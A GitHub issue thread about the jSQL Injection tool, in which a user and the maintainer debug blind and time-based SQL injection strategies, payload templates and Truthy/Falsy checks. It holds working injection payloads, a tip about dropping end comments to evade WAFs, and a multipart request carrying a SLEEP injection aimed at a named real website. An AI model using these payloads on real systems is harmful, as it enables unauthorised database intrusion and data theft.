jsql-injection
Fails to validate the valid payload
Hello, sorry to raise an old question but the Discussion section is not enabled.
Trying to achieve this payload which includes OR and AND in blind injection, but whatever I do jSQL fails to validate it...
1' OR 3*2*1=6 AND 000913=000913 --
So editing the Blind strategy to ' ${boolean.mode} 3*2*1=6 AND ${test} I'm getting
1%27OR+3*2*1=6+AND+0%2b1=1--+-L6hK
jSQL fails to validate the payload. Another valid payload is for time-based:
1 AND (SELECT 7670 FROM (SELECT(SLEEP(5)))JESy)
What I did in the SQL Engine was, in Strategy->Time, to add
${boolean.mode}
(SELECT 7670 FROM
(SELECT(SLEEP(
${sleep_time}
)))JESy)
and take out the end comment from Configuration, but the result which I get is
1AND%28SELECT+7670+FROM%28SELECT%SLEEP%286%29%29%29JESy%29--+-v2LU
It's still adding end comments even if I take it out from Configuration, and there is no space between commands; I think that's why it's failing in injection.
And I wanna ask, how to run a check on multipart content-type?
1. [...] trying this payload OR and AND in blind injection [...] ' ${boolean.mode} 3*2*1=6 AND ${test}
First let's take a high level example and assume that the server is running this query pattern, which is always false:
sql$ SELECT result FROM (SELECT 1 result)x WHERE 'unknown'='<payload>'
===> 0 row
To exploit such a query the payload has to have an OR pattern to bypass the WHERE which is always false, otherwise the result will always be unreliable:
payload: ' OR <test> --+
With each part of the payload explained:
': Closes the default string
OR: Bypasses the always false with a dynamic <test>
<test>: Blind or Time character test
--+: Closes the query properly
So the end query should be similar to this for the <test> to be reliable:
sql$ SELECT result FROM (SELECT 1 result)x WHERE 'unknown'='' OR <test> --+'
===> 1 row when <test>=true
===> 0 row when <test>=false
Now imagine you use an always true statement like 3*2*1=6 in the OR statement, the <test> becomes always true and is now unreliable:
sql$ SELECT result FROM (SELECT 1 result)x WHERE 'unknown'='' OR 3*2*1=6 AND <test> --+'
===> always 1 row
That's why the default Blind payload is just ${boolean.mode} ${test}, it generates either AND <test> or OR <test> depending on which one works.
2. [...] another valid payload is for time-based
Various remarks:
- Like the previous answer, if the server is using an always false query like WHERE 'unknown'='<payload>' then you have to be in an OR. Do not use an always true statement like 3*2*1=6 in the OR otherwise the strategy will fail (see previous paragraph)
- The default Time pattern which is IF(<test>,1,SLEEP) should work fine, though you can adapt it or change it to another one like (SELECT SLEEP FROM (select 1)x WHERE <test>). You must note that each pattern contains the <test>.
Default Time payload with IF:
${boolean.mode} if(
${test},
1,
sleep(${sleep_time})
)
Another Time payload with SELECT:
${boolean.mode} (
SELECT SLEEP(${sleep_time})
FROM (select 1)x
WHERE ${test}
)
- I don't see the <test> in your payload below:
${boolean.mode}
(SELECT 7670 FROM
(SELECT(SLEEP(
${sleep_time}
)))JESy)
You have to add ${test} somewhere for the strategy to make sense.
- The JESy in the middle of the SQL query is a syntax error and can't be valid
- The following similar payload you are using seems incorrect because the SLEEP is always evaluated before the <test>, which makes every query sleep and makes the strategy unreliable:
${boolean.mode} (
SELECT 1
FROM (SLEEP(${sleep_time}) )x
WHERE ${test}
)
===> always sleeping
3. how to run a check on multipart content-type?
I'm not sure that the header field next to the address bar would be usable for that, theoretically I guess. But I'm not really aware of the multipart use-case in regard to SQL injection. Processing injection during a multipart upload of a file? I suppose it's not really common, though I may be mistaken.
My point was that even when I recreate a valid payload for jSQL, it doesn't find it as a true payload; when testing manually they are injectable, but not in jSQL.
Multipart is not always for uploading files, here is an example request:
POST /misc.php?do=dodonate HTTP/1.1
Content-Type: multipart/form-data; boundary=----------YWJkMTQzNDcw
X-Requested-With: XMLHttpRequest
Referer: https://www.{REDACTED}.com/
Cookie: bb_lastvisit=1653177391; bb_lastactivity=0; bb_calendar=e4980fb9d4b7d67ea90ddd4e9326de3ef28a7a44a-3-%7Bs-7-.calyear._i-2016_s-8-.calmonth._i-12_s-8-.calview1._s-11-.displayweek._%7D; bb_forum_view=7ed3e6206555a26a04c1eb08f341ae0ae66a0a6ba-1-%7Bi-194_i-1653185564_%7D
Content-Length: 304
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,br
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.0 Safari/537.36
Host: www.audioshark.org
Connection: Keep-alive
------------YWJkMTQzNDcw
Content-Disposition: form-data; name="securitytoken"
guest
------------YWJkMTQzNDcw
Content-Disposition: form-data; name="chooser"
25|3
------------YWJkMTQzNDcw
Content-Disposition: form-data; name="amount"
if(now()=sysdate(),sleep(6),0)
------------YWJkMTQzNDcw--
valid Time Based
About blind payloads, which one will be the most efficient strategy for jSQL to test from all the tested payloads?
-1' OR 2+913-913-1=0+0+0+1 -- => TRUE
-1' OR 3+913-913-1=0+0+0+1 -- => FALSE
-1' OR 3*2<(0+5+913-913) -- => FALSE
-1' OR 3*2>(0+5+913-913) -- => FALSE
-1' OR 2+1-1+1=1 AND 000913=000913 -- => FALSE
-1' OR 3*2=5 AND 000913=000913 -- => FALSE
-1' OR 3*2=6 AND 000913=000913 -- => TRUE
-1' OR 3*2*0=6 AND 000913=000913 -- => FALSE
-1' OR 3*2*1=6 AND 000913=000913 -- => TRUE
Also when loading data, if the site or connection times out, jSQL stops and starts from the beginning. Is there a way to overcome this? Why not save the session and resume it, or retry like 5-10 times then stop? That's a pretty annoying bug.
- [...] when testing manually they are injectable but not in jsql [...] About blind payload which one will be the most efficient
You can define the list of Blind checks that must be true in the tab Truthy of the SQL Engine and adapt the default list to add new checks if really required. You can also adapt similarly checks that must be false in the tab Falsy.
Though the default list should be robust enough.
For example, I've added your Truthy checks to the default list and validated a Blind strategy (careful, plus sign + had to be urlencoded to %2B):

So a Blind/Time strategy must pass all the Truthy and Falsy checks in order to be valid. A single failure in one of the checks will make the strategy fail, so you may use the tab Network to debug which check has failed.
I've also reviewed the blind payloads you've listed and found a typo on the 4th one:
-1' OR 2+913-913-1=0+0+0+1 -- => TRUE :heavy_check_mark:
-1' OR 3+913-913-1=0+0+0+1 -- => FALSE :heavy_check_mark:
-1' OR 3*2<(0+5+913-913) -- => FALSE :heavy_check_mark:
-1' OR 3*2>(0+5+913-913) -- => FALSE :red_circle: => TRUE
-1' OR 2+1-1+1=1 AND 000913=000913 -- => FALSE :heavy_check_mark:
-1' OR 3*2=5 AND 000913=000913 -- => FALSE :heavy_check_mark:
-1' OR 3*2=6 AND 000913=000913 -- => TRUE :heavy_check_mark:
-1' OR 3*2*0=6 AND 000913=000913 -- => FALSE :heavy_check_mark:
-1' OR 3*2*1=6 AND 000913=000913 -- => TRUE :heavy_check_mark:
Use those dummy tests on any MySQL instance to validate the checks:
select result from (select 1 result)x where '1'='-1' OR 2+913-913-1=0+0+0+1 -- => TRUE
select result from (select 1 result)x where '1'='-1' OR 3+913-913-1=0+0+0+1 -- => FALSE
select result from (select 1 result)x where '1'='-1' OR 3*2<(0+5+913-913) -- => FALSE
select result from (select 1 result)x where '1'='-1' OR 3*2>(0+5+913-913) -- => TRUE
select result from (select 1 result)x where '1'='-1' OR 2+1-1+1=1 AND 000913=000913 -- => FALSE
select result from (select 1 result)x where '1'='-1' OR 3*2=5 AND 000913=000913 -- => FALSE
select result from (select 1 result)x where '1'='-1' OR 3*2=6 AND 000913=000913 -- => TRUE
select result from (select 1 result)x where '1'='-1' OR 3*2*0=6 AND 000913=000913 -- => FALSE
select result from (select 1 result)x where '1'='-1' OR 3*2*1=6 AND 000913=000913 -- => TRUE
jSQL should find the strategy automatically if you managed to manually confirm the injection, otherwise it means that one of the Truthy or Falsy checks has failed.
You can also review the pattern of any check URL to verify if it's correct, for example:
URL:
http://localhost:8080/blind?tenant=mysql&name=3533535353%27+or+2%2B913-913-1=0%2B0%2B0%2B1--+-kpjE
3533535353%27: payload prefix similar to -1'
or: mode OR because query is always false
2%2B913-913-1=0%2B0%2B0%2B1: one of Truthy checks
--+-: payload suffix to comment the end of query
kpjE: random for cache purpose
- Multipart: I'll review how it's done on other tools to see if it could be integrated into jSQL.
- [...] if the site or connection timeouts jsql stops and starts from the beginning
I'm not sure I have encountered this behavior; when the injection has failed then the connection is closed and the injection must be retried from the beginning for sure.
I'm currently not fond of session saving because it leads to other problems, like session resume/restore/corruption, and users are not aware of those session behaviors. Also usually when the injection is done then the work is over and the user does not replay any session.
About unstable connection and timeouts, I would rather use the following options in Preferences:
Connection: Limit processing to X thread(s) ; default 10 threads
Injection: Disable database's metadata injection
Injection: Limit Normal UNION strategy to X column
Currently experimenting based on the discussion to add colors to the logs, making easier the debugging of Truthy/Falsy checks and of Boolean queries.
- Visual feedback in logs when a Boolean query is true :green_circle: or false :red_circle:. Here for Truthy and Falsy checks: every Falsy is false and every Truthy is true, meaning that the injection pattern is confirmed:

- Visual feedback in logs on Blind queries when retrieving an ASCII character: :green_circle::red_circle::green_circle::red_circle::red_circle::green_circle::green_circle::red_circle: :arrow_right: 01100101 :arrow_right: e

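The Truthy/Falsy validation described in this answer, and the earlier point about always-true statements in the OR, modelled as an added example (not jSQL's own code): an in-memory SQLite stand-in for the thread's always-false query pattern, the check expressions lifted from the payload list, and a resolver that mimics ${boolean.mode} by keeping the first of AND/OR that passes every check. It also shows that a template in which an always-true term swallows ${test} cannot be validated, and that the 4th listed check actually evaluates true. The QUERY string, PREFIX/SUFFIX and the SQLite backend are assumptions of this example.

```python
import sqlite3

# Constructed stand-in for the server-side query pattern from the thread; it is
# always false on its own, so only an OR-based payload can make it return a row.
QUERY = "select result from (select 1 result)x where '1'='{payload}'"
PREFIX, SUFFIX = "-1'", " -- "   # jSQL-style prefix and end-of-query comment

# Truthy / Falsy check expressions, lifted from the payload list in the thread
TRUTHY = ["2+913-913-1=0+0+0+1", "3*2=6 AND 000913=000913", "3*2*1=6 AND 000913=000913"]
FALSY = ["3+913-913-1=0+0+0+1", "3*2<(0+5+913-913)", "2+1-1+1=1 AND 000913=000913",
         "3*2=5 AND 000913=000913", "3*2*0=6 AND 000913=000913"]
DISPUTED = "3*2>(0+5+913-913)"  # listed as FALSE in the thread, but 6>5 is true

DB = sqlite3.connect(":memory:")  # assumption: SQLite instead of MySQL for the dummy tests

def row_count(payload: str) -> int:
    """Splice the payload into the always-false query and count the rows returned."""
    return len(DB.execute(QUERY.format(payload=payload)).fetchall())

def render(template: str, mode: str, test: str) -> str:
    """Expand the jSQL placeholders ${boolean.mode} and ${test} of a strategy template."""
    return template.replace("${boolean.mode}", mode).replace("${test}", test)

def validate_strategy(template: str, mode: str) -> bool:
    """Valid only if every Truthy check returns a row and every Falsy check returns none."""
    run = lambda test: row_count(PREFIX + " " + render(template, mode, test) + SUFFIX)
    return all(run(t) == 1 for t in TRUTHY) and all(run(f) == 0 for f in FALSY)

def detect_mode(template: str):
    """Mimic ${boolean.mode} resolution: first of AND/OR passing all checks, else None."""
    return next((m for m in ("AND", "OR") if validate_strategy(template, m)), None)

if __name__ == "__main__":
    # Default Blind template: AND fails (query stays always false), OR passes
    print("default  :", detect_mode("${boolean.mode} ${test}"))              # OR
    # An always-true term after ${test} makes every Falsy check return a row
    print("swallowed:", detect_mode("${boolean.mode} ${test} OR 3*2*1=6"))  # None
    # The 4th check of the thread returns a row, so it belongs in Truthy, not Falsy
    print("4th check:", row_count(f"{PREFIX} OR {DISPUTED}{SUFFIX}"), "row(s)")  # 1
```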
Hey @ron190
Just checking back for updates...
How is the visual feedback in logs development going? And I hope you will make changes to allow us to remove the end comment, as Time Based can now be exploited without end-comments and some WAFs detect when there is an end-comment, so it's still causing an issue in jSQL for me and there is no option to remove it.
In the meantime I've experimented with dark mode implementation, it was so painful that I gave up and lost focus on other features and used my free time elsewhere (single man project anyway :| if anyone can give a hand then enjoy and do a PR, it's ezpz).
So, looking to motivate myself, the latest paper mentioning jSQL from security researchers brings some topics I want to program (see last tweet and ML paper: https://wootconference.org/papers/woot23-paper17.pdf), not limited to the following:
- finalize logs visual feedback and optimize main algorithm to reduce number of queries
- strategies for stacked query, DNS out-of-band and multi-bits injection (see "lightspeed" paper: https://aircconline.com/csit/papers/vol10/csit101909.pdf)
- continuous deployment with Kubernetes
@-to-all Anyone managing DNS out-of-band locally or on Docker, anyone giving instructions to reproduce is more than welcome.
> @mastercho ...allow us to remove end comment as Time Based now can be exploited without end-comments...
Curious about a query sample, have you got any? Have you tested removing the end comment from the engine?
New release v0.86 includes colors in logs to track boolean queries more easily.
So when detection fails then checking for root causes is possible looking at the logs: all false queries must fail, all true queries must pass.
And ASCII characters can also be tracked in the logs.
- Prefix, Time and Blind successful detection
- Boolean bit query details: bit#{char-index}~{bitwise-index}:{ascii-letter}